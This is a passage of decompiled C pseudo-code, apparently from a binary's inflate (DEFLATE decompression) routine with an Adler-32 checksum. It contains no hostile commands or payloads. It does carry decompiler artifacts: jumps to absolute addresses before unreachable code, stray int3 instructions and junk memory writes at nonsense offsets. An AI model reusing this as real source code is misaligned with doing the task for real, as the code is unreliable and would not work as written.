    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L453;
    									} else {
    										 *(__ebp - 0xd4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L461;
    									}
    								}
    								goto L600;
    							case 0x13:
    								if(0 != 0) {
    									goto L479;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L478;
    									} else {
    										 *(__ebp - 0xdc) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L486;
    									}
    								}
    								goto L600;
    							case 0x14:
    								if(0 != 0) {
    									goto L536;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L535;
    									} else {
    										 *(__ebp - 0xa8) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L543;
    									}
    								}
    								goto L600;
    							case 0x15:
    								if(0 == 0) {
    								}
    								goto L581;
    							case 0x16:
    								if(0 == 0) {
    								}
    								goto L244;
    							case 0x17:
    								if(0 == 0) {
    								}
    								L45:
    								 *(_t2870 - 0x1c) = 0xffffffff;
    								_t2465 =  *(_t2870 + 8);
    								 *_t2465 = 0x24;
    								goto L600;
    							case 0x18:
    								if(0 == 0) {
    								}
    								goto L495;
    							case 0x19:
    								if(0 != 0) {
    									goto L146;
    								} else {
    									goto L144;
    								}
    								goto L600;
    							case 0x1a:
    								if(0 == 0) {
    								}
    								goto L114;
    							case 0x1b:
    								if(0 == 0) {
    								}
    								goto L149;
    							case 0x1c:
    								if(0 != 0) {
    									goto L555;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L554;
    									} else {
    										 *(__ebp - 0xac) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L562;
    									}
    								}
    								goto L600;
    							case 0x1d:
    								if(0 != 0) {
    									goto L570;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L569;
    									} else {
    										 *(__ebp - 0x90) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L577;
    									}
    								}
    								goto L600;
    							case 0x1e:
    								if(0 != 0) {
    									goto L122;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L121;
    									} else {
    										 *(__ebp - 0xb8) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L129;
    									}
    								}
    								goto L600;
    							case 0x1f:
    								if(0 != 0) {
    									goto L135;
    								} else {
    									goto L134;
    								}
    								goto L600;
    							case 0x20:
    								if(0 != 0) {
    									L504:
    									 *(_t2870 - 0x1c) = 2;
    									_t1692 =  *(_t2870 + 8);
    									 *_t1692 = 0x35;
    								} else {
    									L503:
    									_t2465 =  *(_t2870 - 0x14);
    									if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
    										 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t2870 + 0x14)) + ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88))));
    										 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
    										 *(_t2870 - 0x7c) =  *(_t2870 - 0x7c) + 1;
    										L502:
    										 *(_t2870 - 0x118) =  *(_t2870 - 0x10);
    										_t2086 =  *(_t2870 - 0x10) - 1;
    										 *(_t2870 - 0x10) = _t2086;
    										if( *(_t2870 - 0x118) == 0) {
    											L350:
    											_t1747 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    											if(_t1747 < 4) {
    												L352:
    												if( *(_t2870 - 8) >= 0xf) {
    													L381:
    													goto 0x230bac;
    													_t2519 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    													 *(_t2870 - 0x3c) = _t2519;
    													if( *(_t2870 - 0x3c) < 0) {
    														 *(_t2870 - 0x50) = 0xa;
    														do {
    															 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2519 * 0 + 0x920 + ( !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001)) * 2));
    															_t2519 =  *(_t2870 - 0x50) + 1;
    															 *(_t2870 - 0x50) = _t2519;
    														} while ( *(_t2870 - 0x3c) < 0);
    													} else {
    														 *(_t2870 - 0x50) =  *(_t2870 - 0x3c) >> 9;
    														 *(_t2870 - 0x3c) =  *(_t2870 - 0x3c) & 0x000001ff;
    													}
    													 *(_t2870 - 0x10) =  *(_t2870 - 0x3c);
    													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x50);
    													_t1747 =  *(_t2870 - 8) -  *(_t2870 - 0x50);
    													 *(_t2870 - 8) = _t1747;
    													_t2086 = 0;
    													if(0 != 0) {
    														goto L352;
    													} else {
    														if( *(_t2870 - 0x10) < 0x100) {
    															L389:
    															_t2465 =  *(_t2870 - 0x14);
    															if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
    																 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
    																_t2086 =  *(_t2870 - 0x14) + 1;
    																 *(_t2870 - 0x14) = _t2086;
    																goto L417;
    															} else {
    																L390:
    																 *(_t2870 - 0x1c) = 2;
    																_t1692 =  *(_t2870 + 8);
    																 *_t1692 = 0x18;
    															}
    														} else {
    															goto L418;
    														}
    													}
    												} else {
    													if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
    														_t1747 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
    														 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
    														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    														goto L381;
    													} else {
    														L354:
    														goto 0x230b73;
    														_t2534 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    														 *(_t2870 - 0x3c) = _t2534;
    														if( *(_t2870 - 0x3c) < 0) {
    															if( *(_t2870 - 8) <= 0xa) {
    																goto L365;
    															} else {
    																 *(_t2870 - 0x50) = 0xa;
    																while(1) {
    																	goto 0x230b86;
    																	_t1747 =  !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001);
    																	 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2534 * 0 + 0x920 + _t1747 * 2));
    																	_t2534 =  *(_t2870 - 0x50) + 1;
    																	 *(_t2870 - 0x50) = _t2534;
    																	if( *(_t2870 - 0x3c) >= 0) {
    																		break;
    																	}
    																	_t1747 =  *(_t2870 - 0x50) + 1;
    																	if( *(_t2870 - 8) >= _t1747) {
    																		continue;
    																	}
    																	break;
    																}
    																if( *(_t2870 - 0x3c) < 0) {
    																	goto L365;
    																} else {
    																	goto L378;
    																}
    															}
    														} else {
    															_t1747 =  *(_t2870 - 0x3c) >> 9;
    															 *(_t2870 - 0x50) = _t1747;
    															if( *(_t2870 - 0x50) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x50)) {
    																L365:
    																_t2086 =  *(_t2870 - 4);
    																if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																	 *(_t2870 - 0xc4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																	 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																	goto L376;
    																} else {
    																	L366:
    																	_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																	if(_t2465 == 0) {
    																		 *(_t2870 - 0xc4) = 0;
    																		L374:
    																		L376:
    																		if(0 != 0) {
    																			goto L365;
    																		} else {
    																			 *(_t2870 - 0xc) =  *(_t2870 - 0xc4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																			_t1747 =  *(_t2870 - 8) + 8;
    																			 *(_t2870 - 8) = _t1747;
    																			if( *(_t2870 - 8) < 0xf) {
    																				goto L354;
    																			} else {
    																				goto L378;
    																			}
    																		}
    																	} else {
    																		L367:
    																		 *(_t2870 - 0x1c) = 1;
    																		_t1692 =  *(_t2870 + 8);
    																		 *_t1692 = 0x17;
    																	}
    																}
    															} else {
    																L378:
    																goto L381;
    															}
    														}
    													}
    												}
    											} else {
    												_t2086 =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
    												if(_t2086 >= 2) {
    													if( *(_t2870 - 8) < 0xf) {
    														_t1747 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    														 *(_t2870 - 0xc) = _t1747;
    														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    													}
    													_t2164 =  *(_t2870 - 0xc) & 0x000003ff;
    													 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + _t2164 * 2));
    													if( *(_t2870 - 0x38) < 0) {
    														 *(_t2870 - 0x54) = 0xa;
    														do {
    															_t2164 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2164 * 0 + 0x920 + ( !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001)) * 2));
    															 *(_t2870 - 0x38) = _t2164;
    															 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
    														} while ( *(_t2870 - 0x38) < 0);
    													} else {
    														 *(_t2870 - 0x54) =  *(_t2870 - 0x38) >> 9;
    													}
    													 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
    													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x54);
    													_t1863 =  *(_t2870 - 8) -  *(_t2870 - 0x54);
    													 *(_t2870 - 8) = _t1863;
    													if(( *(_t2870 - 0x10) & 0x00000100) == 0) {
    														if( *(_t2870 - 8) < 0xf) {
    															_t1863 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    															 *(_t2870 - 0xc) = _t1863;
    															 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    															 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    														}
    														_t2171 =  *(_t2870 - 0xc) & 0x000003ff;
    														 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1863 * 0 + 0x120 + _t2171 * 2));
    														if( *(_t2870 - 0x38) < 0) {
    															 *(_t2870 - 0x54) = 0xa;
    															do {
    																_t1868 =  !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001);
    																_t2171 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2171 * 0 + 0x920 + _t1868 * 2));
    																 *(_t2870 - 0x38) = _t2171;
    																 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
    															} while ( *(_t2870 - 0x38) < 0);
    														} else {
    															_t1868 =  *(_t2870 - 0x38) >> 9;
    															 *(_t2870 - 0x54) = _t1868;
    														}
    														goto 0x230c1e;
    														asm("int3");
    														 *(_t2870 - 0xc) = _t1868 >> _t2171;
    														 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x54);
    														 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
    														_t1872 =  *(_t2870 - 0x38) & 0x00000100;
    														if(_t1872 == 0) {
    															_t2086 =  *(_t2870 - 0x14);
    															 *((char*)(_t2086 + (_t1872 << 0))) =  *(_t2870 - 0x38);
    															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 2;
    															L417:
    															goto L350;
    														} else {
    															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
    															 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
    															goto L418;
    														}
    													} else {
    														L418:
    														 *(_t2870 - 0x10) =  *(_t2870 - 0x10) & 0x000001ff;
    														if( *(_t2870 - 0x10) != 0x100) {
    															_t1769 =  *(0x22ac1c +  *(_t2870 - 0x10) * 4);
    															 *(_t2870 - 0x24) = _t1769;
    															_t2180 =  *(_t2870 - 0x10);
    															_t2566 =  *(0x22b634 + _t2180 * 4);
    															 *(_t2870 - 0x10) = _t2566;
    															if( *(_t2870 - 0x24) == 0) {
    																L437:
    																if( *(_t2870 - 8) >= 0xf) {
    																	L468:
    																	_t2182 =  *((short*)( *(_t2870 + 8) + (_t1769 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																	 *(_t2870 - 0x44) = _t2182;
    																	if( *(_t2870 - 0x44) < 0) {
    																		 *(_t2870 - 0x4c) = 0xa;
    																		do {
    																			 *(_t2870 - 0x44) =  *((short*)( *(_t2870 + 8) + (_t2182 << 0) + 0x40 + 0x920 + ( !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001)) * 2));
    																			_t2182 =  *(_t2870 - 0x4c) + 1;
    																			 *(_t2870 - 0x4c) = _t2182;
    																		} while ( *(_t2870 - 0x44) < 0);
    																	} else {
    																		 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
    																		 *(_t2870 - 0x44) =  *(_t2870 - 0x44) & 0x000001ff;
    																	}
    																	 *(_t2870 - 0x28) =  *(_t2870 - 0x44);
    																	_t1769 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x4c);
    																	 *(_t2870 - 0xc) = _t1769;
    																	 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x4c);
    																	_t2566 = 0;
    																	if(0 != 0) {
    																		goto L437;
    																	} else {
    																		 *(_t2870 - 0x24) =  *(0x22b0a0 +  *(_t2870 - 0x28) * 4);
    																		_t2592 =  *(_t2870 - 0x28);
    																		_t1789 =  *(0x22b120 + _t2592 * 4);
    																		 *(_t2870 - 0x28) = _t1789;
    																		if( *(_t2870 - 0x24) == 0) {
    																			L493:
    																			 *(_t2870 - 0x7c) =  *(_t2870 - 0x14) -  *((intOrPtr*)(_t2870 + 0x14));
    																			_t2465 =  *(_t2870 - 0x28);
    																			if(_t2465 <=  *(_t2870 - 0x7c)) {
    																				L498:
    																				_t2211 = ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88)) +  *((intOrPtr*)(_t2870 + 0x14));
    																				 *(_t2870 - 0x30) = _t2211;
    																				if( *(_t2870 - 0x14) <=  *(_t2870 - 0x30)) {
    																					_t2211 =  *(_t2870 - 0x30);
    																					 *(_t2870 - 0xf4) = _t2211;
    																				} else {
    																					_t1789 =  *(_t2870 - 0x14);
    																					 *(_t2870 - 0xf4) = _t1789;
    																				}
    																				if( *(_t2870 - 0xf4) +  *(_t2870 - 0x10) <=  *((intOrPtr*)(_t2870 - 0x70))) {
    																					if( *(_t2870 - 0x10) < 9 ||  *(_t2870 - 0x10) >  *(_t2870 - 0x28)) {
    																						L522:
    																						goto L523;
    																					} else {
    																						 *((intOrPtr*)(_t2870 - 0x11c)) = ( *(_t2870 - 0x10) & 0xfffffff8) +  *(_t2870 - 0x30);
    																						do {
    																							 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2211 * 0));
    																							 *((intOrPtr*)( *(_t2870 - 0x14) + (4 << 0))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (4 << 0)));
    																							_t2211 =  *(_t2870 - 0x14) + 8;
    																							 *(_t2870 - 0x14) = _t2211;
    																							_t2612 =  *(_t2870 - 0x30) + 8;
    																							 *(_t2870 - 0x30) = _t2612;
    																							_t1789 =  *(_t2870 - 0x30);
    																						} while (_t1789 <  *((intOrPtr*)(_t2870 - 0x11c)));
    																						_t2086 =  *(_t2870 - 0x10) & 0x00000007;
    																						 *(_t2870 - 0x10) = _t2086;
    																						if( *(_t2870 - 0x10) >= 3) {
    																							do {
    																								goto L522;
    																								L523:
    																								 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t1789 * 0));
    																								 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 0)));
    																								 *((char*)( *(_t2870 - 0x14) + (1 << 1))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 1)));
    																								_t2086 =  *(_t2870 - 0x14) + 3;
    																								 *(_t2870 - 0x14) = _t2086;
    																								 *(_t2870 - 0x30) =  *(_t2870 - 0x30) + 3;
    																								_t1789 =  *(_t2870 - 0x10) - 3;
    																								 *(_t2870 - 0x10) = _t1789;
    																							} while ( *(_t2870 - 0x10) > 2);
    																							if( *(_t2870 - 0x10) > 0) {
    																								_t1798 =  *(_t2870 - 0x14);
    																								 *_t1798 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2086 * 0));
    																								if( *(_t2870 - 0x10) > 1) {
    																									 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t1798 << 0)));
    																								}
    																								_t2086 =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
    																								 *(_t2870 - 0x14) = _t2086;
    																							}
    																						} else {
    																							if( *(_t2870 - 0x10) != 0) {
    																								_t2086 =  *(_t2870 - 0x14);
    																								 *_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2612 * 0));
    																								if( *(_t2870 - 0x10) > 1) {
    																									_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t2086 << 0)));
    																									 *( *(_t2870 - 0x14) + (1 << 0)) = _t2086;
    																								}
    																								 *(_t2870 - 0x14) =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
    																							}
    																						}
    																						goto L350;
    																					}
    																					L601:
    																					 *(_t2075 + 0x5189f455) =  *(_t2075 + 0x5189f455) | _t2086;
    																					 *(_t2075 + 0x4289f045) =  *(_t2075 + 0x4289f045) | _t2086;
    																					_t2870 = _t2870;
    																					 *(_t2075 + 0x5189dc55) =  *(_t2075 + 0x5189dc55) | _t2086;
    																					 *((intOrPtr*)(_t2075 + 0x4d8b0845)) =  *((intOrPtr*)(_t2075 + 0x4d8b0845)) - _t2086;
    																					asm("cld");
    																					 *( *(_t2870 + 0x10)) = _t2465 + 1 -  *(_t2870 + 0xc);
    																					 *( *(_t2870 + 0x1c)) =  *(_t2870 - 0x14) -  *(_t2870 + 0x18);
    																					if(( *(_t2870 + 0x20) & 0x00000009) != 0 &&  *(_t2870 - 0x1c) >= 0) {
    																						 *(_t2870 - 0x58) =  *(_t2870 + 0x18);
    																						 *(_t2870 - 0x98) =  *( *(_t2870 + 0x1c));
    																						 *(_t2870 - 0x20) =  *( *(_t2870 + 8) + 0x1c) & 0x0000ffff;
    																						 *(_t2870 - 0x2c) =  *( *(_t2870 + 8) + 0x1c) >> 0x10;
    																						_t1700 =  *(_t2870 - 0x98);
    																						_t1701 = _t1700 / 0x15b0;
    																						_t2473 = _t1700 % 0x15b0;
    																						 *(_t2870 - 0xa0) = _t2473;
    																						while( *(_t2870 - 0x98) != 0) {
    																							 *(_t2870 - 0x84) = 0;
    																							while( *(_t2870 - 0x84) + 7 <  *(_t2870 - 0xa0)) {
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + _t2473 * 0) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 0)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 1)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 3) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 2)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 5) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 6) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 7) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								_t2473 =  *(_t2870 - 0x84) + 8;
    																								 *(_t2870 - 0x84) = _t2473;
    																								_t1701 =  *(_t2870 - 0x58) + 8;
    																								 *(_t2870 - 0x58) = _t1701;
    																							}
    																							while(1) {
    																								_t2097 =  *(_t2870 - 0x84);
    																								if(_t2097 >=  *(_t2870 - 0xa0)) {
    																									break;
    																								}
    																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58)) & 0x000000ff) +  *(_t2870 - 0x20);
    																								 *(_t2870 - 0x58) =  *(_t2870 - 0x58) + 1;
    																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
    																								_t1701 =  *(_t2870 - 0x84) + 1;
    																								 *(_t2870 - 0x84) = _t1701;
    																							}
    																							goto 0x230d69;
    																							asm("int3");
    																							asm("int3");
    																							asm("int3");
    																							asm("int3");
    																							asm("int3");
    																							 *(_t2870 - 0x20) = _t1701 % _t2097;
    																							_t1706 =  *(_t2870 - 0x2c);
    																							_t1701 = _t1706 / 0xfff1;
    																							 *(_t2870 - 0x2c) = _t1706 % 0xfff1;
    																							_t2473 =  *(_t2870 - 0x98) -  *(_t2870 - 0xa0);
    																							 *(_t2870 - 0x98) = _t2473;
    																							 *(_t2870 - 0xa0) = 0x15b0;
    																						}
    																						_t1704 = ( *(_t2870 - 0x2c) << 0x10) +  *(_t2870 - 0x20);
    																						_t2094 =  *(_t2870 + 8);
    																						 *((intOrPtr*)(_t2094 + 0x1c)) = _t1704;
    																						if( *(_t2870 - 0x1c) == 0 && ( *(_t2870 + 0x20) & 0x00000001) != 0) {
    																							goto 0x230d81;
    																							asm("int3");
    																							if( *((intOrPtr*)(_t1704 + 0x1c)) !=  *((intOrPtr*)(_t2094 + 0x10))) {
    																								 *(_t2870 - 0x1c) = 0xfffffffe;
    																							}
    																						}
    																					}
    																					_t1688 =  *(_t2870 - 0x1c);
    																					goto L622;
    																				} else {
    																					goto L502;
    																				}
    																			} else {
    																				_t1789 =  *(_t2870 + 0x20) & 0x00000004;
    																				if(_t1789 == 0) {
    																					goto L498;
    																				} else {
    																					L495:
    																					 *(_t2870 - 0x1c) = 0xffffffff;
    																					_t2086 =  *(_t2870 + 8);
    																					 *_t2086 = 0x25;
    																				}
    																			}
    																		} else {
    																			L476:
    																			_t2233 =  *(_t2870 - 8);
    																			if(_t2233 >=  *(_t2870 - 0x24)) {
    																				L490:
    																				goto 0x230cba;
    																				asm("int3");
    																				asm("int3");
    																				asm("int3");
    																				 *(_t2870 - 0x120) = (_t2592 << _t2233) - 0x00000001 &  *(_t2870 - 0xc);
    																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
    																				 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x24);
    																				_t2592 = 0;
    																				if(0 != 0) {
    																					goto L476;
    																				} else {
    																					_t1789 =  *(_t2870 - 0x28) +  *(_t2870 - 0x120);
    																					 *(_t2870 - 0x28) = _t1789;
    																					goto L493;
    																				}
    																			} else {
    																				L477:
    																				_t2465 =  *(_t2870 - 4);
    																				if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																					 *(_t2870 - 0xdc) =  *( *(_t2870 - 4)) & 0x000000ff;
    																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																					goto L488;
    																				} else {
    																					L478:
    																					_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    																					if(_t1692 == 0) {
    																						 *(_t2870 - 0xdc) = 0;
    																						L486:
    																						L488:
    																						if(0 != 0) {
    																							goto L477;
    																						} else {
    																							_t2592 =  *(_t2870 - 0xdc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																							 *(_t2870 - 0xc) = _t2592;
    																							 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
    																							_t2233 =  *(_t2870 - 8);
    																							if(_t2233 <  *(_t2870 - 0x24)) {
    																								goto L477;
    																							} else {
    																								goto L490;
    																							}
    																						}
    																					} else {
    																						L479:
    																						 *(_t2870 - 0x1c) = 1;
    																						_t2086 =  *(_t2870 + 8);
    																						 *_t2086 = 0x1b;
    																					}
    																				}
    																			}
    																		}
    																	}
    																} else {
    																	_t2190 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    																	if(_t2190 >= 2) {
    																		_t1769 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
    																		 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2190 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
    																		 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    																		 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    																		goto L468;
    																	} else {
    																		L439:
    																		_t1769 =  *((short*)( *(_t2870 + 8) + (_t2566 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																		 *(_t2870 - 0x44) = _t1769;
    																		if( *(_t2870 - 0x44) < 0) {
    																			if( *(_t2870 - 8) <= 0xa) {
    																				goto L452;
    																			} else {
    																				 *(_t2870 - 0x4c) = 0xa;
    																				do {
    																					_t2588 =  *(_t2870 + 8) + (_t1769 << 0) + 0x40;
    																					_t1769 =  !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001);
    																					 *(_t2870 - 0x44) =  *((short*)(_t2588 + 0x920 + _t1769 * 2));
    																					 *(_t2870 - 0x4c) =  *(_t2870 - 0x4c) + 1;
    																					if( *(_t2870 - 0x44) < 0) {
    																						goto L449;
    																					}
    																					break;
    																					L449:
    																					_t1769 =  *(_t2870 - 0x4c) + 1;
    																				} while ( *(_t2870 - 8) >= _t1769);
    																				if( *(_t2870 - 0x44) < 0) {
    																					goto L452;
    																				} else {
    																					goto L465;
    																				}
    																			}
    																		} else {
    																			 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
    																			if( *(_t2870 - 0x4c) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x4c)) {
    																				L452:
    																				_t2086 =  *(_t2870 - 4);
    																				if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																					 *(_t2870 - 0xd4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																					goto L463;
    																				} else {
    																					L453:
    																					_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																					if(_t2465 == 0) {
    																						 *(_t2870 - 0xd4) = 0;
    																						L461:
    																						L463:
    																						if(0 != 0) {
    																							goto L452;
    																						} else {
    																							_t2566 =  *(_t2870 - 0xd4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																							 *(_t2870 - 0xc) = _t2566;
    																							_t1769 =  *(_t2870 - 8) + 8;
    																							 *(_t2870 - 8) = _t1769;
    																							if( *(_t2870 - 8) < 0xf) {
    																								goto L439;
    																							} else {
    																								goto L465;
    																							}
    																						}
    																					} else {
    																						L454:
    																						 *(_t2870 - 0x1c) = 1;
    																						_t1692 =  *(_t2870 + 8);
    																						 *_t1692 = 0x1a;
    																					}
    																				}
    																			} else {
    																				L465:
    																				goto L468;
    																			}
    																		}
    																	}
    																}
    															} else {
    																L421:
    																if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
    																	L435:
    																	goto 0x230c45;
    																	asm("int3");
    																	asm("int3");
    																	asm("int3");
    																	 *(_t2870 - 0x124) = (_t2566 << _t2180) - 0x00000001 &  *(_t2870 - 0xc);
    																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
    																	_t2180 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
    																	 *(_t2870 - 8) = _t2180;
    																	_t2566 = 0;
    																	if(0 != 0) {
    																		goto L421;
    																	} else {
    																		_t1769 =  *(_t2870 - 0x10) +  *(_t2870 - 0x124);
    																		 *(_t2870 - 0x10) = _t1769;
    																		goto L437;
    																	}
    																} else {
    																	L422:
    																	_t2086 =  *(_t2870 - 4);
